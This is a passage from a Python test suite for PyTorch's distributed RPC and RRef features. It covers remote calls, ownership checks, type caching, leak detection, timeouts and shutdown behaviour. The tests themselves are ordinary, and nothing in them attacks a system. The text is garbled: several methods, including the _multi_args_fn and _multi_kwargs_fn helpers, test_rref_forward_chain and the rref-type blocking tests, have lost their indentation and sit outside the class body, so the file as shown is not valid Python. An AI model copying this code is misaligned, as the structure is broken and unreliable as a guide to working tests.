        """Run the shared nested-RPC check."""
        self._nested_rpc(nested_rpc, torch.ones(2, 2) + 1)
    @dist_init
    def test_stress_light_rpc(self):
        """Stress-test with a lightweight RPC payload."""
        self._stress_test_rpc(light_rpc)
    @dist_init
    def test_stress_heavy_rpc(self):
        """Stress-test with a heavyweight tensor RPC payload."""
        self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
    @dist_init
    def test_stress_heavy_rpc_torchscript(self):
        """Stress-test with a heavyweight TorchScript RPC payload."""
        self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
    @dist_init
    def test_builtin_remote_ret(self):
        """remote() of a builtin op returns the expected value via the RRef."""
        self._builtin_remote_ret(
            torch.ones(2, 2),
            torch.ones(2, 2),
            torch.ones(2, 2) * 2
        )
    @dist_init
    def test_builtin_remote_self(self):
        """remote() of a builtin op targeting the local worker returns the
        expected value."""
        self._builtin_remote_self(
            torch.ones(2, 2),
            torch.ones(2, 2),
            torch.ones(2, 2) * 2
        )
@staticmethod
def _multi_args_fn(n, sparse=False):
if sparse:
return (build_sparse_tensor(), build_sparse_tensor())
else:
return (torch.ones(n, n), torch.ones(n, n))
    @dist_init
    def test_multi_builtin_remote_ret(self):
        """Run the shared multi-remote-call check with a builtin op."""
        self._test_multi_remote_call(
            torch.add, False,
            args_fn=RpcTest._multi_args_fn
        )
    @dist_init
    def test_py_udf_remote(self):
        """remote() of a Python UDF with kwargs returns the expected value via
        to_here()."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        rref = rpc.remote(
            worker_name(dst_rank),
            my_function,
            kwargs={"a": n, "b": n + 1, "c": n + 2},
        )
        self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@staticmethod
def _multi_kwargs_fn(n, sparse=False):
if sparse:
return {
"a": build_sparse_tensor(),
"b": build_sparse_tensor(),
"c": build_sparse_tensor()
}
else:
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
    @dist_init
    def test_multi_py_udf_remote(self):
        """Run the shared multi-remote-call check with a Python UDF."""
        self._test_multi_remote_call(
            my_function,
            False,
            kwargs_fn=RpcTest._multi_kwargs_fn
        )
    @dist_init
    def test_py_rref_args(self):
        """Run the shared check for passing RRefs as RPC arguments."""
        self._py_rref_args(
            torch.ones(2, 2),
            1,
            torch.ones(2, 2),
            2,
            torch.ones(2, 2) * 2 + 3)
    @dist_init
    def test_py_rref_args_user_share(self):
        """Run the shared check for user-shared RRef arguments."""
        self._py_rref_args_user_share(
            torch.ones(2, 2),
            1,
            2,
            torch.ones(2, 2),
            3,
            4,
            torch.ones(2, 2) * 2 + 10
        )
    @dist_init
    def test_py_rpc_rref_args(self):
        """Run the shared check for RRef arguments passed through rpc calls."""
        self._py_rpc_rref_args(
            torch.ones(2, 2),
            1,
            2,
            torch.ones(2, 2),
            3,
            4,
            torch.ones(2, 2) * 2 + 10
        )
    @dist_init
    def test_nested_remote(self):
        """Run the shared nested-remote check."""
        self._nested_remote(
            nested_remote,
            torch.ones(2, 2) + 3
        )
    @dist_init
    def test_nested_rref(self):
        """Run the shared nested-RRef check."""
        self._nested_rref(
            nested_rref,
            torch.ones(2, 2) + 1,
            torch.ones(2, 2) + 2
        )
    @dist_init
    def test_nested_rref_stress(self):
        """Stress variant of the nested-RRef check."""
        self._nested_rref_stress(
            nested_rref,
            torch.ones(2, 2) + 1,
            torch.ones(2, 2) + 2
        )
    @dist_init
    def test_multi_layer_nested_async_rpc(self):
        """Kick off a chain of nested async RPCs and return immediately."""
        # This test will exit right away, but there will be a chain of async
        # RPCs. The termination algorithm should detect those messages properly.
        # Otherwise, some peer could exit early, leaving others to timeout
        # errors or connection closed errors.
        ttl = 20
        n = self.rank + 1
        dst_rank = n % self.world_size
        multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
    @dist_init
    def test_remote_with_exception(self):
        """to_here() re-raises exceptions from remote calls, for both another
        worker and self."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        # check ref to other workers
        rref = rpc.remote(worker_name(dst_rank), raise_func)
        with self.assertRaises(ValueError):
            rref.to_here()
        # check ref to itself
        rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
        with self.assertRaises(TypeError):
            rref.to_here()
    @dist_init
    def test_rpc_return_rref(self):
        """An RRef returned from an rpc_sync call can be dereferenced with
        to_here()."""
        n = self.rank + 1
        dst_rank1 = n % self.world_size
        dst_rank2 = (n + 1) % self.world_size
        rref = rpc.rpc_sync(
            worker_name(dst_rank1),
            rpc_return_rref,
            args=(worker_name(dst_rank2),),
        )
        self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
    @dist_init
    def test_local_rref_no_fork(self):
        """A locally created RRef exposes its value via local_value()."""
        local_rref = RRef(35)
        self.assertEqual(local_rref.local_value(), 35)
    @dist_init
    def test_local_value_not_on_owner(self):
        """local_value() on a user (non-owner) RRef must raise with a message
        naming the owner worker."""
        # ensure that an error message is thrown if a user tries to call
        # local_value() on a non-owning node.
        next_rank = (self.rank + 1) % self.world_size
        rref = rpc.remote(
            worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
        )
        with self.assertRaisesRegex(
            RuntimeError, (
                fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
                fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
                r"can't call localValue\(\) on user "
                fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
                fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
            )
        ):
            rref.local_value()
    @dist_init
    def test_return_local_rrefs(self):
        """RRefs returned from an RPC can be used to mutate and then read the
        remote values they own."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        rref_list = rpc.rpc_sync(
            worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
        )
        for rref in rref_list:
            rpc.rpc_sync(
                rref.owner(),
                _call_method_on_rref,
                args=(MyClass.increment_value, rref, 10),
            )
        rets = [
            rpc.rpc_sync(
                rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
            )
            for rref in rref_list
        ]
        self.assertEqual(rets, [11, 12, 13])
    @dist_init
    def _test_rref_type(self, blocking):
        """_get_type should launch an RPC only for the first call, cache the
        result (same future object when non-blocking), and return the
        owner-side type."""
        def launched_rpc(events):
            # True if the profiled events show a type-query RPC was sent.
            expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
            return any([e.name.startswith(expected_name) for e in events])
        dst = worker_name((self.rank + 1) % self.world_size)
        rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
        with _profile() as p:
            t = rref._get_type(blocking=blocking)
            if not blocking:
                t = t.wait()
        self.assertTrue(launched_rpc(p.function_events))
        expected_type = type(torch.ones(2))
        self.assertEqual(t, expected_type)
        futs = []
        def verify(fut):
            self.assertEqual(fut.value(), expected_type)
        with _profile() as p:
            for _ in range(10):
                t = rref._get_type(blocking=blocking)
                if not blocking:
                    futs.append(t)
                    t.add_done_callback(verify)
                    t = t.wait()
                self.assertEqual(t, expected_type)
        if not blocking:
            # Note that cached calls with blocking=False all return the same
            # cached original future.
            first_fut = futs[0]
            for f in futs[1:]:
                self.assertTrue(f is first_fut)
        # Ensure we never launch another RPC, other than for the very
        # first call.
        self.assertFalse(launched_rpc(p.function_events))
        self.assertEqual(t, type(torch.ones(2)))
        rref = rpc.remote(dst, MyClass, args=(0,))
        rref_type = rref._get_type(blocking=blocking)
        if not blocking:
            rref_type = rref_type.wait()
        self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
    @dist_init
    def _test_rref_type_with_error(self, blocking):
        """Errors raised during remote creation propagate through _get_type()."""
        dst = worker_name((self.rank + 1) % self.world_size)
        # The remote function raises, so type retrieval must surface the error.
        rref = rpc.remote(dst, raise_func)
        # Blocking: error raised inline
        if blocking:
            with self.assertRaisesRegex(ValueError, "Expected error"):
                rref._get_type(blocking=blocking)
        else:
            # Non-blocking: Immediately return future, block on wait
            fut = rref._get_type(blocking=blocking)
            with self.assertRaisesRegex(ValueError, "Expected error"):
                fut.wait()
    def test_rref_type_with_error_blocking(self):
        self._test_rref_type_with_error(blocking=True)
    def test_rref_type_with_error_non_blocking(self):
        self._test_rref_type_with_error(blocking=False)
    @dist_init
    def _test_rref_type_owner(self, blocking):
        """_get_type() on an OwnerRRef resolves locally, for tensors and
        user-defined classes alike."""
        rref = RRef(torch.ones(2) + 1)
        rref_type = rref._get_type(blocking=blocking)
        if not blocking:
            rref_type = rref_type.wait()
        self.assertEqual(rref_type, type(torch.ones(2)))
        rref = RRef(MyClass(0))
        rref_type = rref._get_type(blocking=blocking)
        if not blocking:
            rref_type = rref_type.wait()
        self.assertEqual(rref_type, MyClass)
    def test_rref_type_owner_blocking(self):
        self._test_rref_type_owner(blocking=True)
    def test_rref_type_owner_non_blocking(self):
        self._test_rref_type_owner(blocking=False)
    @staticmethod
    def _slow_add(x, y):
        # Deliberately slow add, used to exercise slow-initialization and
        # timeout code paths in the tests below.
        time.sleep(1)
        return x + y
    @dist_init
    def test_rref_type_slow_init(self):
        """_get_type() blocks until a slow remote creation completes."""
        dst = worker_name((self.rank + 1) % self.world_size)
        rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
        self.assertEqual(rref._get_type(), type(torch.ones(2)))
    @dist_init
    def test_owner_equality(self):
        """WorkerInfo equality and hashing: RRefs owned by the same worker
        compare equal and collide on the same dict key."""
        a = RRef(40)
        b = RRef(50)
        other_rank = (self.rank + 1) % self.world_size
        other_a = rpc.remote(
            worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
        )
        other_b = rpc.remote(
            worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
        )
        other_a.to_here()  # to ensure clean termination
        other_b.to_here()
        # WorkerInfo never equals a non-WorkerInfo value.
        self.assertNotEqual(a.owner(), 23)
        self.assertEqual(other_a.owner(), other_b.owner())
        self.assertNotEqual(a.owner(), other_a.owner())
        self.assertEqual(other_a.owner(), other_a.owner())
        self.assertEqual(other_a.owner(), other_b.owner())
        self.assertEqual(a.owner(), a.owner())
        self.assertEqual(a.owner(), b.owner())
        self.assertEqual(a.owner(), rpc.get_worker_info())
        # Same-owner insertions overwrite each other, so only 2 keys remain.
        x = dict()
        x[a.owner()] = a
        x[other_a.owner()] = other_a
        self.assertEqual(x[a.owner()], a)
        self.assertEqual(x[b.owner()], a)
        self.assertEqual(x[other_a.owner()], other_a)
        self.assertEqual(x[other_b.owner()], other_a)
        self.assertEqual(len(x), 2)
    @dist_init
    def test_pass_local_rrefs(self):
        """A locally owned RRef can be passed as an argument through
        rpc_sync, rpc_async, and rpc.remote."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        dst_worker = worker_name(dst_rank)
        rref = RRef(40)
        self.assertEqual(
            rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
        )
        self.assertEqual(
            rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
        )
        self.assertEqual(
            rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
        )
    @dist_init
    def test_remote_same_worker(self):
        """UserRRefs can be forwarded to another remote call on their owner."""
        n = self.rank + 1
        dst_rank = n % self.world_size
        rref_a = rpc.remote(
            worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
        )
        rref_b = rpc.remote(
            worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
        )
        # rref_c consumes rref_a and rref_b on the same owner worker.
        rref_c = rpc.remote(
            worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
        )
        self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
    @dist_init(setup_rpc=True)
    def test_call_method_on_rref(self):
        """
        Tests that it is possible to call an instance method on a remote object
        by using rref.owner() as destination of the call.
        """
        vals = [10, 2, 5, 7]
        dst_rank = (self.rank + 1) % self.world_size
        dst_worker = worker_name(dst_rank)
        # creates a remote object
        rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
        # modifies state of the remote object via all three RPC APIs
        rpc.rpc_sync(
            rref.owner(),
            _call_method_on_rref,
            args=(MyClass.increment_value, rref, vals[1]),
        )
        rpc.rpc_async(
            rref.owner(),
            _call_method_on_rref,
            args=(MyClass.increment_value, rref, vals[2]),
        ).wait()
        rpc.remote(
            rref.owner(),
            _call_method_on_rref,
            args=(MyClass.increment_value, rref, vals[3]),
        ).to_here()
        # queries state of the remote object
        result = rpc.rpc_sync(
            dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
        )
        self.assertEqual(result, sum(vals))
    # Notice `rpc.api.shutdown()` accesses
    # `_delete_all_user_and_unforked_owner_rrefs` through
    # `torch.distributed.rpc.api`, so patching
    # `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
    # not help.
    @mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
    def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
        """With RRef cleanup mocked out, graceful shutdown must detect leaked
        RRefs — unless api._ignore_rref_leak is set."""
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        # Wait for all init to complete.
        dist.barrier()
        # Create an RRef that will never be cleaned up (cleanup is mocked).
        rref = rpc.remote(
            worker_name((self.rank + 1) % self.world_size),
            torch.add,
            args=(torch.ones(2, 2), 1),
        )
        import torch.distributed.rpc.api as api
        if ignore_leak:
            api._ignore_rref_leak = True
            rpc.shutdown(graceful=True)
        else:
            api._ignore_rref_leak = False
            with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
                rpc.shutdown(graceful=True)
    @dist_init(setup_rpc=False)
    def test_rref_leak(self):
        self._test_rref_leak(ignore_leak=False)
    @dist_init(setup_rpc=False)
    def test_ignore_rref_leak(self):
        self._test_rref_leak(ignore_leak=True)
    @dist_init
    def test_rref_str(self):
        """__str__ distinguishes OwnerRRef from UserRRef and embeds the
        creator rank and local ids."""
        rref1 = RRef(self.rank)
        id_class = "GloballyUniqueId"
        self.assertEqual(
            "OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
        )
        dst_rank = (self.rank + 1) % self.world_size
        rref2 = rpc.remote(
            worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
        )
        # UserRRef string carries both the RRefId and the ForkId.
        self.assertEqual(
            rref2.__str__(),
            "UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
                id_class, self.rank
            ),
        )
    @dist_init
    def test_rref_get_future(self):
        """_get_future() returns a torch._C.Future for builtin, Python UDF,
        and TorchScript remote calls."""
        # Tests that we can obtain the future corresponding to the creation of
        # the RRef on remote end
        if self.rank == 0:
            # Builtin
            rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
            rref.to_here()
            fut = rref._get_future()
            self.assertIsInstance(fut, torch._C.Future)
            # UDF
            rref = rpc.remote(worker_name(1), foo_add, args=())
            rref.to_here()
            fut = rref._get_future()
            self.assertIsInstance(fut, torch._C.Future)
            # Script
            rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
            rref.to_here()
            fut = rref._get_future()
            self.assertIsInstance(fut, torch._C.Future)
    @dist_init
    def test_rref_context_debug_info(self):
        """RRef-context debug counters (num_owner_rrefs / num_pending_users)
        track local creation, RPC sharing, and rpc.remote forks."""
        # This test checks local states that are modified by remote workers.
        # This means that we would need barrier before and after every check.
        # The barrier before the check makes sure that all previous states are
        # cleared globally, the barrier after ensures that no following states
        # change gets into the current check.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        # Check 1: local RRef does not update owners_ map or add a pending user.
        #################################################
        rref1 = RRef(self.rank)
        # don't need a barrier here as local RRef is handled by this thread
        info = _rref_context_get_debug_info()
        self.assertIn("num_owner_rrefs", info)
        self.assertIn("num_pending_users", info)
        # RRef on local value is not added to context until shared across RPC
        self.assertEqual(0, int(info["num_owner_rrefs"]))
        self.assertEqual(0, int(info["num_pending_users"]))
        # barrier after the check 1
        dist.barrier()
        # Check 2: Sharing RRef as an arg should update owners_ map
        ###########################################################
        dst_rank = (self.rank + 1) % self.world_size
        rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
        # barrier before check 2
        wait_until_pending_futures_and_users_flushed()
        dist.barrier()
        info = _rref_context_get_debug_info()
        self.assertIn("num_owner_rrefs", info)
        self.assertEqual(1, int(info["num_owner_rrefs"]))
        # no pending users since the fork is finished
        self.assertEqual(0, int(info["num_pending_users"]))
        # barrier after check 2
        dist.barrier()
        # clear states for check 2
        rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
        # Wait for owner rref to be cleared.
        while int(info["num_owner_rrefs"]) != 0:
            info = _rref_context_get_debug_info()
            time.sleep(0.1)
        dist.barrier()
        # Check 3: rpc.remote call should update owners_ map
        ####################################################
        rref2 = rpc.remote(
            worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
        )
        rref3 = rpc.remote(
            worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
        )
        rref2.to_here()
        rref3.to_here()
        # barrier before check 3
        wait_until_pending_futures_and_users_flushed()
        dist.barrier()
        info = _rref_context_get_debug_info()
        self.assertIn("num_owner_rrefs", info)
        self.assertEqual(2, int(info["num_owner_rrefs"]))
        # no pending users since the fork is finished
        self.assertEqual(0, int(info["num_pending_users"]))
        # barrier after check 3
        dist.barrier()
    @dist_init
    def test_disable_gil_profiling(self):
        """GIL wait-time metrics appear in agent debug info only after
        rpc.enable_gil_profiling(True)."""
        # test that rpc.enable_gil_profiling(false) will result in
        # GIL wait time not being recorded.
        # GIL profiling should be disabled by default.
        dst_rank = (self.rank + 1) % self.world_size
        rpc.rpc_sync(
            worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
        )
        info = rpc.api._get_current_rpc_agent().get_debug_info()
        self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
        rpc.enable_gil_profiling(True)
        rpc.rpc_sync(
            worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
        )
        info = rpc.api._get_current_rpc_agent().get_debug_info()
        self.assertIn("agent.gil_average_wait_time_us", info)
    @dist_init(setup_rpc=False)
    def test_local_shutdown(self):
        """RPC can be initialized and immediately shut down non-gracefully."""
        # test that we can start RPC and then immediately locally shutdown
        # without sending any messages.
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        # pass in graceful=False to ensure that we don't wait for other workers.
        rpc.shutdown(graceful=False)
    @dist_init
    def test_debug_info(self):
        """_get_debug_info() is the union of rref/agent/autograd debug info,
        with no key collisions between the three sources."""
        # only test keys in this test case. Values should be covered by
        # individual module debug info tests
        import torch.distributed.autograd as dist_autograd
        info = _get_debug_info()
        rref_info = _rref_context_get_debug_info()
        agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
        autograd_info = dist_autograd._get_debug_info()
        common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
        self.assertEqual(0, len(common_keys))
        expected = {}
        expected.update(rref_info)
        expected.update(agent_info)
        expected.update(autograd_info)
        # NB: Key ordering is only preserved in python 3.6+. So here, we
        # manually check keys are equal.
        for key in expected.keys():
            self.assertIn(key, info.keys())
        for key in info.keys():
            self.assertIn(key, expected.keys())
    @dist_init(setup_rpc=False)
    @sandcastle_skip_if(
        IS_MACOS,
        "Test is flaky on MacOS since libuv error handling is not as robust as TCP",
    )
    def test_handle_send_exceptions(self):
        """Sending an RPC to a worker that has gone down raises an error
        instead of crashing the caller."""
        # test that if a callee node has gone down, we raise an appropriate
        # exception instead of just crashing.
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        rpc._set_rpc_timeout(10)
        # This barrier is needed to ensure that some workers do not exit before
        # others have been brought up.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        if self.rank == 1:
            dst_rank = (self.rank + 1) % self.world_size
            dst_worker = worker_name(dst_rank)
            # allow destination worker to exit without joining
            error_str = self.get_shutdown_error_regex()
            wait_until_node_failure(dst_rank, error_str)
            fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
            # Shutdown sequence is not very well defined and as a result
            # we can see any of the error messages defined in get_shutdown_error_regex.
            with self.assertRaisesRegex(RuntimeError, error_str):
                fut.wait()
        # exit all workers non-gracefully.
        rpc.shutdown(graceful=False)
    @dist_init
    def test_deadlock(self):
        """Regression test for the deadlock reported in pytorch#45089:
        an RPC wait followed by process-group init must complete."""
        # this test is copied from https://github.com/pytorch/pytorch/issues/45089
        if self.rank == 1:
            dst1 = worker_name((self.rank + 1) % self.world_size)
            x = torch.ones(2)
            y = torch.ones(2)
            # timeout guards against hanging forever if the deadlock regresses
            rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
        dist_initialized = dist.is_initialized()
        if not dist_initialized:
            dist.init_process_group(
                backend="gloo",
                init_method=self.file_init_method,
                rank=self.rank,
                world_size=self.world_size,
            )
    @dist_init(setup_rpc=False)
    def test_local_shutdown_with_rpc(self):
        """Non-graceful shutdown works after real RPC traffic has been sent."""
        # test that we can start RPC, send RPCs, and then run local shutdown.
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        n = self.rank + 1
        dst_rank = n % self.world_size
        rpc.rpc_sync(
            worker_name(dst_rank),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n)),
        )
        # A barrier is needed to ensure that all RPCs are processed.
        # Otherwise, some RPCs can timeout since the receiving end
        # has terminated.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        # pass in graceful=False to ensure that we don't wait for other workers.
        rpc.shutdown(graceful=False)
    @dist_init(setup_rpc=False)
    def test_set_and_get_default_rpc_timeout(self):
        """rpc_timeout passed through backend options is reflected by
        rpc.get_rpc_timeout()."""
        timeout = 0.5
        # A new `RpcBackendOptions` is constructed
        # when accessing `self.rpc_backend_options`.
        rpc_backend_options = self.rpc_backend_options
        rpc_backend_options.rpc_timeout = timeout
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=rpc_backend_options,
        )
        set_timeout = rpc.get_rpc_timeout()
        self.assertEqual(timeout, set_timeout)
        rpc.shutdown()
    @dist_init
    def test_default_timeout_used(self):
        """
        Tests that if no timeout is passed into rpc_async and rpc_sync, then the
        default timeout is used.
        """
        dst_rank = (self.rank + 1) % self.world_size
        rpc._set_rpc_timeout(0.001)  # 1 ms
        # futures should time out and be marked with an exception indicating it as such.
        futs = [
            rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
            for _ in range(10)
        ]
        expected_error = self.get_timeout_error_regex()
        for fut in futs:
            with self.assertRaisesRegex(RuntimeError, expected_error):
                fut.wait()
        # ensure that if a new timeout is set old futures don't time out but new ones do.
        rpc._set_rpc_timeout(200)  # 200 seconds
        # create a longstanding RPC.
        fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
        # now, set a short timeout.
        rpc._set_rpc_timeout(0.001)
        # fut2 should time out, fut1 should not.
        fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut2.wait()
        fut1.wait()
        # Zero timeout means infinity, so future should run to completion.
        rpc._set_rpc_timeout(0)
        rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
        # reset to default timeout so shutdown messages can process cleanly.
        rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
    @dist_init
    def test_rpc_timeouts(self):
        """Per-call timeouts override the default; 0 means no timeout."""
        # TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
        dst_rank = (self.rank + 1) % self.world_size
        dst_worker = worker_name(dst_rank)
        timeout = 0.1  # 100 ms
        expected_error = self.get_timeout_error_regex()
        # Test async UDF
        fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut.wait()
        # Ensure run to completion if there is no timeout and we use the default
        # RPC timeout.
        rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
        # Test sync UDF
        with self.assertRaisesRegex(RuntimeError, expected_error):
            rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
        # Ensure run to completion if there is no timeout and we use the default
        # RPC timeout.
        rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
        # If we set a default timeout for RPCs, it should be respected, though
        # still overridden if we pass in a different timeout to the APIs.
        rpc._set_rpc_timeout(0.001)
        fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut.wait()
        with self.assertRaisesRegex(RuntimeError, expected_error):
            rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
        # The RPCs should run to completion since we override the timeout.
        rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
        rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
        # Passing in a zero timeout should ensure that the RPC won't time out.
        rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
        rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
        # Reset for clean shutdown
        rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
    def test_dist_init_decorator(self):
        """@dist_init works both parameterized and bare, and preserves the
        wrapped function's return value."""
        @dist_init(setup_rpc=False)
        def test_func(self):
            return "expected result"
        self.assertEqual(test_func(self), "expected result")
        @dist_init
        def test_func(self):
            return "expected result"
        self.assertEqual(test_func(self), "expected result")
    def test_use_rpc_pickler(self):
        """_use_rpc_pickler swaps the default pickler inside the context and
        restores the internal pickler afterwards."""
        class TestPickler:
            pass
        test_pickler = TestPickler()
        with _use_rpc_pickler(test_pickler):
            self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
        self.assertTrue(
            torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
        )
    @dist_init
    def test_wait_all(self):
        """_wait_all() tracks futures created in the context and waits for
        them on exit; the tracking list is removed afterwards."""
        with _wait_all():
            self.assertTrue(_thread_local_var.future_list == [])
            dst = worker_name((self.rank + 1) % self.world_size)
            fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
            self.assertTrue(len(_thread_local_var.future_list) == 1)
            self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
        # On exit the future has completed.
        self.assertTrue(fut.done())
        self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    @dist_init
    def test_wait_all_multiple_call(self):
        """_wait_all() accumulates every rpc_async future issued inside it."""
        with _wait_all():
            self.assertTrue(_thread_local_var.future_list == [])
            dst = worker_name((self.rank + 1) % self.world_size)
            for i in range(20):
                fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
                res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
                self.assertEqual(res, torch.ones(i, i) + 1)
                self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
            # Only the async calls are tracked; sync calls are not.
            self.assertTrue(len(_thread_local_var.future_list) == 20)
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    @dist_init
    def test_wait_all_timeout(self):
        """A timeout inside _wait_all() propagates out of the context and
        the tracking list is still cleaned up."""
        expected_error = self.get_timeout_error_regex()
        with self.assertRaisesRegex(RuntimeError, expected_error):
            with _wait_all():
                self.assertTrue(_thread_local_var.future_list == [])
                dst = worker_name((self.rank + 1) % self.world_size)
                timeout = 0.1  # 100 ms
                fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    @dist_init
    def test_wait_all_raise_in_user_func(self):
        """A remote UDF error propagates out of _wait_all(), which still
        cleans up its tracking state."""
        with self.assertRaises(ValueError):
            with _wait_all():
                self.assertTrue(_thread_local_var.future_list == [])
                dst = worker_name((self.rank + 1) % self.world_size)
                fut = rpc.rpc_async(dst, raise_func)
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    @dist_init
    def test_wait_all_raise_in_body(self):
        """An exception raised directly in the _wait_all() body propagates
        and the tracking state is cleaned up."""
        with self.assertRaises(ValueError):
            with _wait_all():
                raise_func()
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    # Class-level Event; initialized per-process by the exit-early tests below
